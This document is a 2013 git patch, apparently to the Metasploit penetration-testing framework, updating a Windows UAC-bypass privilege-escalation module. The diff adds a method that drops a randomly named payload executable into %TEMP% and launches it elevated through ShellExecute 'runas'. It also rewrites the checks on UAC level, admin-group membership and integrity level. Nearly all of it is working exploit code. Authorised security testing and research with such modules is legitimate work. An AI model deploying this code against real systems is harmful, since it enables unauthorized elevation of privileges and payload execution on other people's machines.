From 6fdf5cab1537e502fb340532dd71667e34f5231e Mon Sep 17 00:00:00 2001 From: Meatballs Date: Wed, 23 Oct 2013 21:15:41 +0100 Subject: [PATCH] Update bypassuac_injection inline with latest privs lib --- .../windows/local/bypassuac_injection.rb | 52 +++++++++++-------- 1 file changed, 31 insertions(+), 21 deletions(-) diff --git a/modules/exploits/windows/local/bypassuac_injection.rb b/modules/exploits/windows/local/bypassuac_injection.rb index 2a0d57e4bb..4ebf4927ac 100644 --- a/modules/exploits/windows/local/bypassuac_injection.rb +++ b/modules/exploits/windows/local/bypassuac_injection.rb @@ -12,7 +12,6 @@ class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Exploit::EXE - include Post::Common include Post::File include Post::Windows::Priv @@ -52,9 +51,20 @@ class Metasploit3 < Msf::Exploit::Local end + def runas_method + payload = generate_payload_exe + payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" + tmpdir = expand_path("%TEMP%") + tempexe = tmpdir + "\\" + payload_filename + write_file(tempexe, payload) + print_status("Uploading payload: #{tempexe}") + session.railgun.shell32.ShellExecuteA(nil,"runas",tempexe,nil,nil,5) + print_status("Payload executed") + end + def exploit - fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin? + fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin? or is_system? # # Verify use against Vista+ @@ -65,25 +75,27 @@ class Metasploit3 < Msf::Exploit::Local end if is_uac_enabled? - vprint_status "UAC is Enabled, checking level..." + print_status "UAC is Enabled, checking level..." else - fail_with(Exploit::Failure::NotVulnerable, - "UAC is not enabled, no reason to run module, exiting...\r\nRun exploit/windows/local/ask to elevate" - ) + if is_in_admin_group? + fail_with(Exploit::Failure::Unknown, "UAC is disabled and we are in the admin group so something has gone wrong...") + else + fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module") + end end case get_uac_level - when UACPromptCredsIfSecureDesktop, UACPromptConsentIfSecureDesktop, UACPromptCreds, UACPromptConsent - fail_with(Exploit::Failure::NotVulnerable, - "UAC is set to 'Always Notify'\r\nThis module does not bypass this setting, exiting..." - ) - when UACDefault - print_good "UAC is set to Default" - vprint_status "BypassUAC can bypass this setting, continuing..." - when UACNoPrompt - fail_with(Exploit::Failure::NotVulnerable, - "UAC is not enabled, no reason to run module\r\nRun exploit/windows/local/ask to elevate" - ) + when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT + fail_with(Exploit::Failure::NotVulnerable, + "UAC is set to 'Always Notify'\r\nThis module does not bypass this setting, exiting..." + ) + when UAC_DEFAULT + print_good "UAC is set to Default" + print_good "BypassUAC can bypass this setting, continuing..." + when UAC_NO_PROMPT + print_warning "UAC set to DoNotPrompt - using ShellExecute 'runas' method instead" + runas_method + return end # Check if you are an admin @@ -97,13 +109,11 @@ class Metasploit3 < Msf::Exploit::Local if admin_group print_good('Part of Administrators group! Continuing...') else - print_error('Not in admins group, cannot escalate with this module') - print_error('Exiting...') - return + fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module") end end - if get_integrity_level == LowIntegrityLevel + if get_integrity_level == INTEGRITY_LEVEL_SID[:low] fail_with(Exploit::Failure::NoAccess, "Cannot BypassUAC from Low Integrity Level") end